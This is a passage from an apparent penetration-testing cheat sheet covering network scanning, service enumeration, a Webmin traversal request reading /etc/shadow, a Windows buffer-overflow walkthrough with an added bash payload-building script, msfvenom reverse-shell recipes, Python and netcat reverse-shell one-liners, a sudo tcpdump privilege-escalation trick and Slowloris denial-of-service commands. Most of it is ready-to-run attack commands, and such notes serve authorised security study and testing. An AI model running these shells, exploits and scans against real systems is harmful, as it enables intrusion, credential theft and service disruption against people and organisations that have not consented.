`whois domain-name-here.com ` 265 | 266 | `whois $ip` 267 | 268 | - Banner Grabbing 269 | 270 | - `nc -v $ip 25` 271 | 272 | - `telnet $ip 25` 273 | 274 | - `nc TARGET-IP 80` 275 | 276 | - Recon-ng - full-featured web reconnaissance framework written in Python 277 | 278 | - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git ` 279 | 280 | `cd /opt/recon-ng ` 281 | 282 | `./recon-ng ` 283 | 284 | `show modules ` 
`help`

- Active Information Gathering
--------------------------------------------------------------------------------------------------------------------------

- Port Scanning
-----------------------------------------------------------------------------------------------------------
*Subnet Reference Table*

/ | Addresses | Hosts | Netmask | Amount of a Class C
--- | --- | --- | --- | ---
/30 | 4 | 2 | 255.255.255.252 | 1/64
/29 | 8 | 6 | 255.255.255.248 | 1/32
/28 | 16 | 14 | 255.255.255.240 | 1/16
/27 | 32 | 30 | 255.255.255.224 | 1/8
/26 | 64 | 62 | 255.255.255.192 | 1/4
/25 | 128 | 126 | 255.255.255.128 | 1/2
/24 | 256 | 254 | 255.255.255.0 | 1
/23 | 512 | 510 | 255.255.254.0 | 2
/22 | 1024 | 1022 | 255.255.252.0 | 4
/21 | 2048 | 2046 | 255.255.248.0 | 8
/20 | 4096 | 4094 | 255.255.240.0 | 16
/19 | 8192 | 8190 | 255.255.224.0 | 32
/18 | 16384 | 16382 | 255.255.192.0 | 64
/17 | 32768 | 32766 | 255.255.128.0 | 128
/16 | 65536 | 65534 | 255.255.0.0 | 256

- Set the IP address as a variable, then scan every TCP port with version/OS detection
`export ip=192.168.1.100`
`nmap -A -T4 -p- $ip`

- Netcat port scanning (no DNS, very verbose, 1 s timeout, zero-I/O mode)
`nc -nvv -w 1 -z $ip 3388-3390`

- Discover active IPs using ARP on the network (layer 2, so only hosts on the same segment answer):
`arp-scan $ip/24`

- Discover who else is on the network
`netdiscover`

- Discover IP, MAC and MAC vendor from ARP
`netdiscover -r $ip/24`

- Nmap stealth scan using SYN (half-open; the handshake is never completed)
`nmap -sS $ip`

- Nmap stealth scan using FIN (a closed port answers RST, an open one stays silent; useless against Windows, which replies RST to everything)
`nmap -sF $ip`

- Nmap Banner Grabbing
`nmap -sV -sT $ip`

- Nmap OS Fingerprinting
`nmap -O $ip`

- Nmap Regular Scan:
`nmap $ip/24`

- Enumeration Scan
`nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`

- Enumeration Scan All Ports TCP
/ UDP and output to a txt file (a full `-p-` UDP scan is very slow because open|filtered ports never answer; budget hours for a single host)
`nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`

- Nmap output to a file:
`nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`

- Quick Scan (the 100 most common ports):
`nmap -T4 -F $ip/24`

- Quick Scan Plus:
`nmap -sV -T4 -O -F --version-light $ip/24`

- Quick traceroute
`nmap -sn --traceroute $ip`

- All TCP and UDP Ports
`nmap -v -sU -sS -p- -A -T4 $ip`

- Intense Scan:
`nmap -T4 -A -v $ip`

- Intense Scan Plus UDP
`nmap -sS -sU -T4 -A -v $ip/24`

- Intense Scan ALL TCP Ports
`nmap -p 1-65535 -T4 -A -v $ip/24`

- Intense Scan - No Ping (use when hosts drop ICMP and would otherwise be skipped as "down")
`nmap -T4 -A -v -Pn $ip/24`

- Ping scan (host discovery only, no port scan)
`nmap -sn $ip/24`

- Slow Comprehensive Scan
`nmap -s S -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`

- Scan with a full TCP connect to weed out spoofed "open" ports: a SYN scan only sees the SYN/ACK, which some firewalls and decoy tools send for every port, whereas `-sT` completes the handshake, so only ports that really accept a connection show as open
`nmap -p1-65535 -A -T5 -sT $ip`

- Enumeration
-----------

- DNS Enumeration

  - Nmap hostname lookup through a specific resolver (the option is `--dns-servers`, plural)
  `nmap -F --dns-servers <nameserver> $ip`

  - Host Lookup
  `host -t ns megacorpone.com`

  - Reverse Lookup Brute Force - find domains in the same range
  `for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found"`

  - Perform DNS A record lookup
  `dig a domain-name-here.com @nameserver`

  - Perform MX Record Lookup
  `dig mx domain-name-here.com @nameserver`

  - Perform Zone Transfer with dig
  `dig axfr domain-name-here.com @nameserver`

- DNS Zone Transfers
  Windows DNS zone transfer (interactive nslookup)

  `nslookup -> set type=any -> ls -d blah.com`

  Linux DNS zone transfer

  `dig axfr blah.com @ns1.blah.com`

- Dnsrecon DNS Brute Force
`dnsrecon -d TARGET -D
/usr/share/wordlists/dnsmap.txt -t brt --xml output.xml` (the `-D` wordlist is only consulted by the brute-force type `brt`; with `-t std` it is ignored)

- Dnsrecon zone transfer attempt against megacorpone
`dnsrecon -d megacorpone.com -t axfr`

- DNSEnum
`dnsenum zonetransfer.me`

- Nmap Enumeration Script List:

  - Nmap Discovery
  https://nmap.org/nsedoc/categories/discovery.html

  - Nmap port version detection MAXIMUM power (the leading `+` forces the selected scripts to run even when their port rule would normally skip them)
  `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <ports> $ip`

- NFS (Network File System) Enumeration

  - Show Mountable NFS Shares
  `nmap -sV --script=nfs-showmount $ip`

- RPC (Remote Procedure Call) Enumeration

  - Connect to the RPC service with a null session (no username or password) and enumerate privileges
  `rpcclient --user="" --command=enumprivs -N $ip`

  - Connect to the RPC service with a username (you are prompted for the password) and enumerate privileges
  `rpcclient --user=<username> --command=enumprivs $ip`

- SMB Enumeration

  - SMB OS Discovery
  `nmap $ip --script smb-os-discovery.nse`

  - Nmap port scan (grepable output, so the hosts with 139/445 open can be pulled out later)
  `nmap -v -p 139,445 -oG smb.txt $ip-254`

  - NetBIOS Information Scanning
  `nbtscan -r $ip/24`

  - Nmap find exposed NetBIOS servers
  `nmap -sU --script nbstat.nse -p 137 $ip`

  - Nmap all SMB scripts scan (`unsafe=1` also runs the checks that can crash the target service, so keep it off production systems)

  `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`

  - Nmap all SMB scripts authenticated scan (all script arguments go in one `--script-args`; a second one replaces the first)

  `nmap -sV -Pn -vv -p 445 --script-args smbuser=<user>,smbpass=<pass>,unsafe=1 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' $ip`

- SMB Enumeration Tools
`nmblookup -A $ip`

`smbclient //MOUNT/share -I $ip -N`

`rpcclient -U "" $ip`

`enum4linux $ip`

`enum4linux -a $ip`

- SMB Finger
Printing
`smbclient -L //$ip`

- Nmap Scan for Open SMB Shares
`nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`

- Nmap scans for vulnerable SMB Servers (`smb-check-vulns` was removed in Nmap 7 and split into the `smb-vuln-*` scripts)
`nmap -v -p 445 --script='smb-vuln*' --script-args=unsafe=1 $ip`

- List all SMB NSE scripts installed
`ls -l /usr/share/nmap/scripts/smb*`

- Enumerate SMB Users

`nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`

OR

`impacket-samrdump $ip` (older Kali: `python /usr/share/doc/python-impacket-doc/examples/samrdump.py $ip`)

- RID Cycling - Null Sessions
`ridenum.py $ip 500 50000 dict.txt`

- Manual Null Session Testing

Windows: `net use \\$ip\IPC$ "" /u:""`

Linux: `smbclient -L //$ip`

- SMTP Enumeration - Mail Servers

  - Verify SMTP port using Netcat
  `nc -nv $ip 25`

- POP3 Enumeration - Reading other people's mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet (the server's replies start with `+OK`):

    root@kali:~# telnet $ip 110
    +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
    USER billydean
    +OK
    PASS password
    +OK Welcome billydean

    list

    +OK 2 1807
    1 786
    2 1021

    retr 1

    +OK Message follows
    From: jamesbrown@motown.com
    Dear Billy Dean,

    Here is your login for remote desktop ... try not to forget it this time!
    username: billydean
    password: PA$$W0RD!Z

- SNMP Enumeration - Simple Network Management Protocol

  - Fix SNMP output values so they are human readable (install and download the MIBs, then empty the config that tells the client to ignore them)
  `apt-get install snmp-mibs-downloader`
  `download-mibs`
  `echo "" > /etc/snmp/snmp.conf`

  - SNMP Enumeration Commands

  - `snmp-check -t $ip -c public` (`snmpcheck` on older Kali)

  - `snmpwalk -c public -v1 $ip 1`

  - Running processes only (field 4 is the process name; this needs the MIBs above, otherwise walk the numeric OID `1.3.6.1.2.1.25.4.2.1.2` instead):
  `snmpwalk -c public -v1 $ip 1 | grep hrSWRunName | cut -d " " -f 4`

  - `snmpenum -t $ip`

  - `onesixtyone -c names -i hosts` (community-string brute force: `names` is the wordlist, `hosts` the target list)

  - SNMPv3 Enumeration
  `nmap -sV -p 161 --script=snmp-info $ip/24`

  - Automate the username enumeration process for SNMPv3:
  `apt-get install snmp snmp-mibs-downloader`
  `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`

  - SNMP Default Credentials (community strings)
  /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

- MS SQL Server Enumeration

  - Nmap Information Gathering (tries `sa` with an empty password; if that works `ms-sql-xp-cmdshell` executes commands on the server, so be aware of that before running it)

  `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`

- Webmin and miniserv/0.01 Enumeration - Port 10000

  Test for LFI & file disclosure vulnerability by grabbing /etc/passwd (each `..%01/` gets past miniserv's traversal filter but still walks up one directory)

  `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`

  Test to see if webmin is running as root by grabbing /etc/shadow (only root can read it, so success proves the service runs as root)

  `curl
http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`

- Linux OS Enumeration

  - List all SUID files
  `find / -perm -4000 2>/dev/null`

  - Determine the current version of Linux
  `cat /etc/issue`

  - Determine more information about the environment (kernel release and architecture)
  `uname -a`

  - List running processes as a tree
  `ps auxf`

  - List the allowed (and forbidden) commands for the invoking user
  `sudo -l`

  - List iptables rules (needs root; the nat table first, then every table verbosely)

```bash
iptables --table nat --list
iptables -vL -t filter
iptables -vL -t nat
iptables -vL -t mangle
iptables -vL -t raw
iptables -vL -t security
```

- Windows OS Enumeration

  - `net config Workstation`

  - `systeminfo | findstr /B /C:"OS Name" /C:"OS Version"`

  - `hostname`

  - `net users`

  - `ipconfig /all`

  - `route print`

  - `arp -a`

  - `netstat -ano`

  - `netsh firewall show state` (deprecated; on Windows 7 and later use `netsh advfirewall show allprofiles`)

  - `netsh firewall show config`

  - `schtasks /query /fo LIST /v`

  - `tasklist /SVC`

  - `net start`

  - `DRIVERQUERY`

  - `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` (both the HKLM and the HKCU value must be 1 for AlwaysInstallElevated to be exploitable)

  - `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated`

  - `dir /s *pass* == *cred* == *vnc* == *.config*`

  - `findstr /si password *.xml *.ini *.txt`

  - `reg query HKLM /f password /t REG_SZ /s`

  - `reg query HKCU /f password /t REG_SZ /s`

- Vulnerability Scanning with Nmap

  - Nmap Exploit Scripts
  https://nmap.org/nsedoc/categories/exploit.html

  - Nmap search through vulnerability scripts
  `cd /usr/share/nmap/scripts/ && ls -l *vuln*`

  - Nmap search through scripts for a specific keyword
  `ls /usr/share/nmap/scripts/* | grep ftp`

  - Scan with the exploit-category scripts (these actively exploit the target, they are not "safe" scripts)
  `nmap --script exploit -Pn $ip`

  - Nmap Auth Scripts
  https://nmap.org/nsedoc/categories/auth.html

  - Nmap Vuln Scanning
  https://nmap.org/nsedoc/categories/vuln.html

  - Nmap DOS Scanning (the `dos` category will knock services over; only with explicit authorisation)
  `nmap --script dos -Pn $ip`

  Nmap Execute DOS Attack (Slowloris against a web server)
  `nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true -p 80 $ip`

  - Scan for ColdFusion web vulnerabilities
  `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`

  - Anonymous FTP dump with Nmap
  `nmap -v -p 21 --script=ftp-anon.nse $ip-254`

  - SMB security mode scan with Nmap (reports whether message signing is required)
  `nmap -v -p 445 --script=smb-security-mode $ip-254`

- File Enumeration

  - Find SUID/SGID files (run as root or another owner); the parentheses are needed, otherwise `-exec` only applies to the second test, and `-maxdepth` must come before the tests

  - `find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null`

  - Get handy Linux file system enumeration script (/var/tmp)
  `wget https://highon.coffee/downloads/linux-local-enum.sh`
  `chmod +x ./linux-local-enum.sh`
  `./linux-local-enum.sh`

  - Find executable files updated in August, outside the usual system directories
  `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`

  - Find a specific file on Linux
  `find /
-name 'suid*' 2>/dev/null`

  - Find all the strings in a file
  `strings <file>`

  - Determine the type of a file
  `file <file>`

- HTTP Enumeration
----------------

- Search for folders with gobuster (gobuster 3.x syntax; older versions take `-w`/`-u` without the `dir` sub-command):
`gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://$ip`

- OWASP DirBuster - HTTP folder enumeration - can take a dictionary file

- Dirb - Directory brute force finding using a dictionary file
`dirb http://$ip/ wordlist.dict`
`dirb http://$ip/` (uses the built-in default wordlist)

  Dirb through a proxy

  - `dirb http://$ip/ -p $ip:3129`

- Nikto
`nikto -h $ip`

- HTTP Enumeration with Nmap
`nmap --script=http-enum -p80 -n $ip/24`

- Nmap check the server methods
`nmap --script http-methods --script-args http-methods.url-path='/test' $ip`

- Get OPTIONS available from web server
`curl -vX OPTIONS http://$ip/test`

- Uniscan directory finder:
`uniscan -qweds -u http://$ip/`

- Wfuzz - The web brute forcer (`--hc`/`--hw` hide responses by status code / word count, `--sc` shows only the given code, so that only interesting hits remain)

`wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test`

`wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ`

`wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`

`wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`

Recurse level 3

`wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`

- Open a service using a port knock (secured with knockd): hit the ports in sequence with a single SYN each, no retries
`for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x server_ip_address; done`

- WordPress Scan - WordPress security scanner

  - `wpscan --url $ip/blog --proxy $ip:3129`

- RSH Enumeration - rsh is an unencrypted remote shell (one of the Berkeley r-services, with rlogin and rexec), not a file transfer system; Metasploit login scanner:

  -
`auxiliary/scanner/rservices/rsh_login`

- Finger Enumeration

  - `finger @$ip`

  - `finger batman@$ip`

- TLS & SSL Testing

  - `./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html`

- Proxy Enumeration (useful for open proxies)

  - `nikto -useproxy http://$ip:3128 -h $ip`

- Steganography

```bash
apt-get install steghide
steghide extract -sf picture.jpg
steghide info picture.jpg
apt-get install stegosuite
```

- The OpenVAS Vulnerability Scanner (on current Kali the package and setup command are `gvm` and `gvm-setup`)

```bash
apt-get update
apt-get install openvas
openvas-setup
```

  - `netstat -tulpn`

  - Login at:
  https://$ip:9392

Buffer Overflows and Exploits
===================================================================================================================================

- DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)

- Nmap Fuzzers:

  - Nmap Fuzzer List
  https://nmap.org/nsedoc/categories/fuzzer.html

  - Nmap HTTP Form Fuzzer
  `nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip`

  - Nmap DNS Fuzzer
  `nmap --script dns-fuzz --script-args timelimit=2h $ip -d`

- MSFvenom
  https://www.offensive-security.com/metasploit-unleashed/msfvenom/

- Windows Buffer Overflows

  - Controlling EIP: crash the program with a unique cyclic pattern, then look up the value that landed in EIP to get the exact offset

    locate pattern_create
    pattern_create.rb -l 2700
    locate pattern_offset
    pattern_offset.rb -q 39694438

  - Verify exact location of EIP - [*] Exact match at offset 2606 (the four "B"s must land in EIP)

    buffer = "A" * 2606 + "B" * 4 + "C" * 90
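
The offset, bad-character and little-endian steps of the Windows and Linux walkthroughs in this section, as an added bash example (not part of the original notes): `pattern_create` and `pattern_offset` are reimplemented so the 2606 offset can be verified without Metasploit, `le_bytes` packs a return address the way the exploit strings need it, `badchars` builds the 0x00-0xFF probe minus the bytes already found bad, `shellcode_clean` checks msfvenom's `-f c` output against that list, and `build_payload` assembles the final buffer. The EIP value 39694438, the JMP ESP address 0x5f4a358f and the offset 2606 are the ones from the text; the `\xcc\xcc` "shellcode" in the demo is a stand-in.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: helpers for the offset,
# bad-character and little-endian steps of the buffer-overflow walkthrough.

# pattern_create LEN: the cyclic pattern Metasploit's pattern_create.rb emits
# (Aa0Aa1...Zz9), in which every 4-byte window is unique for 20280 bytes.
pattern_create() {
    local len=$1 pat="" u l d
    local U=ABCDEFGHIJKLMNOPQRSTUVWXYZ L=abcdefghijklmnopqrstuvwxyz D=0123456789
    for ((u = 0; u < 26 && ${#pat} < len; u++)); do
        for ((l = 0; l < 26 && ${#pat} < len; l++)); do
            for ((d = 0; d < 10 && ${#pat} < len; d++)); do
                pat+="${U:u:1}${L:l:1}${D:d:1}"
            done
        done
    done
    printf '%s' "${pat:0:len}"
}

# pattern_offset EIP_HEX [LEN]: EIP exactly as the debugger shows it (39694438).
# The CPU loaded that dword little-endian, so reversing its bytes gives the four
# ASCII characters that sat at the overwrite point; their index is the offset.
pattern_offset() {
    local hex needle="" i pat prefix
    hex=$(printf '%08x' "0x${1#0x}")
    for ((i = 6; i >= 0; i -= 2)); do
        needle+=$(printf "\\x${hex:i:2}")
    done
    pat=$(pattern_create "${2:-20280}")
    prefix=${pat%%"$needle"*}
    [ "$prefix" != "$pat" ] || return 1          # value not found in the pattern
    printf '%d' "${#prefix}"
}

# le_bytes ADDR: pack a 32-bit address as the little-endian "\xNN" string the
# exploit needs ("flip around for little endian format").
le_bytes() {
    local hex i out=""
    hex=$(printf '%08x' "0x${1#0x}")
    for ((i = 6; i >= 0; i -= 2)); do
        out+="\\x${hex:i:2}"
    done
    printf '%s' "$out"
}

# badchars [EXCLUDE]: every byte \x00..\xff minus the ones already known to be
# bad, for the "send, inspect memory, drop the byte that broke it, repeat" loop.
badchars() {
    local exclude=${1:-} out="" i b
    for ((i = 0; i < 256; i++)); do
        b=$(printf '\\x%02x' "$i")
        case "$exclude" in *"$b"*) continue ;; esac
        out+="$b"
    done
    printf '%s' "$out"
}

# shellcode_clean SHELLCODE BADCHARS: exit 1 if any bad byte is still present
# in msfvenom's -f c output (lower-case \xNN escapes, as msfvenom prints them).
shellcode_clean() {
    local sc=$1 bad=$2 b
    while [ -n "$bad" ]; do
        b=${bad:0:4}; bad=${bad:4}
        case "$sc" in *"$b"*) echo "bad byte $b present" >&2; return 1 ;; esac
    done
    return 0
}

# build_payload OFFSET RET_ADDR NOPS SHELLCODE: write the raw buffer
# "A"*OFFSET + little-endian RET_ADDR + "\x90"*NOPS + SHELLCODE to stdout.
build_payload() {
    local offset=$1 addr=$2 nops=$3 shellcode=$4 sled="" i
    for ((i = 0; i < nops; i++)); do sled+='\x90'; done
    head -c "$offset" /dev/zero | tr '\0' 'A'
    printf '%b' "$(le_bytes "$addr")${sled}${shellcode}"
}

if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    echo "offset of EIP 39694438 in the pattern: $(pattern_offset 39694438)"
    echo "JMP ESP 0x5f4a358f packed: $(le_bytes 0x5f4a358f)"
    bc=$(badchars '\x00\x0a\x0d')
    echo "bad-character probe after dropping \\x00\\x0a\\x0d: $(( ${#bc} / 4 )) bytes"
    echo "final buffer size: $(build_payload 2606 0x5f4a358f 8 '\xcc\xcc' | wc -c) bytes"
fi
```

`build_payload ... > payload.bin` gives a file you can pipe into `nc` or embed in the Python skeleton; `pattern_offset` defaults to the full 20280-byte pattern, so pass the length you actually sent as the second argument if you generated a longer custom one.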
- Check for "Bad Characters" - send every byte value 0x00-0xFF after the crash, look at what reached memory, drop the byte that truncated or mangled the run and repeat until the whole sequence arrives intact (0x00 is almost always bad; the rest depend on the protocol)

- Use Mona to determine a module that is unprotected (no ASLR, Rebase or SafeSEH, so its addresses are stable between runs)

- Bypass DEP if present by finding a memory location with Read and Execute access for JMP ESP

- Use NASM to determine the opcode bytes for a JMP ESP instruction

    /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
    nasm > JMP ESP
    00000000  FFE4              jmp esp

- Run Mona in the Immunity log window to find the FFE4 (JMP ESP) bytes in that module

    !mona find -s "\xff\xe4" -m slmfc.dll
    found at 0x5f4a358f - Flip around for little endian format
    buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390

- MSFvenom to create payload (excluding the bad characters found above)

    msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

- Final Payload with NOP sled (the sled leaves room because the shikata_ga_nai decoder stub writes to the stack around ESP and would otherwise overwrite the start of the shellcode)

    buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode

- Create a PE Reverse Shell
`msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe`

- Create a PE Reverse Shell and encode 9 times with shikata_ga_nai
`msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe`

- Create a PE reverse shell and embed it into an existing executable
`msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe`

- Create a PE Reverse HTTPS shell
`msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe`

- Linux Buffer Overflows

  - Run Evan's Debugger against an app
  `edb --run /usr/games/crossfire/bin/crossfire`

  - ESP register points toward the end of our
buffer, so instead of jumping straight to ESP we use a short first-stage stub: add 12 to EAX (which points at the start of the data we sent) and jump there

    add eax,12
    jmp eax
    83C00C  add eax,byte +0xc
    FFE0    jmp eax

- Check for "Bad Characters" - process of elimination - run multiple times 0x00 - 0xFF

- Find JMP ESP address (written little-endian in the exploit string)

    "\x97\x45\x13\x08"  # Found at Address 08134597

- crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"

- `msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai`

- Connect to the bind shell with netcat:
`nc -v $ip 4444`

Shells
===================================================================================================================================

- Netcat Shell Listener

`nc -nlvp 4444`

- Spawning a TTY Shell - Break out of jail or a limited shell
You should almost always upgrade your shell after taking control of an apache or www user.

(For example when you encounter an error message when trying to run an exploit: `sh: no job control in this shell`)

(hint: `sudo -l` to see what you can run)

- You may encounter limited shells that use rbash and only allow you to execute a single command per session.
You can overcome this by executing an SSH shell to your localhost:

    ssh user@$ip nc $localip 4444 -e /bin/sh
    enter user's password
    python -c 'import pty; pty.spawn("/bin/sh")'
    export TERM=linux

- Spawn a TTY with Python

`python -c 'import pty; pty.spawn("/bin/sh")'`

- Python reverse shell one-liner (connects back to $ip:1234 and duplicates the socket onto stdin, stdout and stderr before starting the shell)

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

- From within Python: `echo os.system('/bin/bash')`

`/bin/sh -i`

`perl -e 'exec "/bin/sh";'`

perl: `exec "/bin/sh";`

ruby: `exec "/bin/sh"`

lua: `os.execute('/bin/sh')`

From within IRB: `exec "/bin/sh"`

From within vi: `:!bash`
or

`:set shell=/bin/bash:shell`

From within vim: `:!bash`

From within nmap (interactive mode): `!sh`

From within tcpdump (abuses the `-z` post-rotate command, which `-Z root` runs as root; the script path must be the same in both places)

    echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test
    chmod +x /tmp/.test
    sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

From busybox: `/bin/busybox telnetd -l /bin/sh -p9999`

- Pentest Monkey PHP reverse shell
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

- php-findsock-shell - turns PHP port 80 into an interactive shell
http://pentestmonkey.net/tools/web-shells/php-findsock-shell

- Perl Reverse Shell
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell

- PHP powered web browser shell b374k with file upload etc.
https://github.com/b374k/b374k

- Windows reverse shell - PowerSploit's Invoke-Shellcode script, used to inject a Meterpreter shell
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1

- Web Backdoors from Fuzzdb
https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors

- Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/

*Linux*

`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf`

*Windows*

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe`

*Mac*

`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f macho > shell.macho`

**Web Payloads**

*PHP*

`msfvenom -p php/reverse_php LHOST=<ip> LPORT=<port> -f raw > shell.php`

OR

`msfvenom -p php/meterpreter_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.php`

Then we need to add the `<?php` opening tag at the first line of the file so that it is executed as PHP (older msfvenom versions leave it out of raw PHP output; check the first line). The original does it with the macOS clipboard tools; on Linux prepend the tag with an editor:

`cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php`

*ASP*

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f asp > shell.asp`

*JSP*

`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.jsp`

*WAR*

`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war > shell.war`

**Scripting Payloads**

*Python*

`msfvenom -p cmd/unix/reverse_python LHOST=<ip> LPORT=<port> -f raw > shell.py`

*Bash*

`msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=<port> -f raw > shell.sh`

*Perl*

`msfvenom -p cmd/unix/reverse_perl LHOST=<ip> LPORT=<port> -f raw > shell.pl`

**Shellcode**

For all shellcode see `msfvenom --help-formats` for information as to
valid parameters. Msfvenom will output code that can be cut and pasted into your exploit in that language.

*Linux Based Shellcode*

`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f <language>`

*Windows Based Shellcode*

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f <language>`

*Mac Based Shellcode*

`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f <language>`

**Handlers**
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format, saved as a resource file such as `handler.rc` (the PAYLOAD must be the same one you baked into the binary with msfvenom, or the staged connection fails):

    use exploit/multi/handler
    set PAYLOAD <payload>
    set LHOST <ip>
    set LPORT <port>
    set ExitOnSession false
    exploit -j -z

Once the required values are completed the following command will execute your handler: `msfconsole -r handler.rc`

- SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/

    use auxiliary/scanner/ssh/ssh_login
    use post/multi/manage/shell_to_meterpreter

- SBD.exe

sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only.
sbd.exe (part of the Kali Linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe) can be uploaded to a Windows box as a Netcat alternative.
- Shellshock

  - Testing for Shellshock with Nmap (the script sends the `() { :;}; ...` function definition in a request header to the given CGI and looks for the injected command's output)

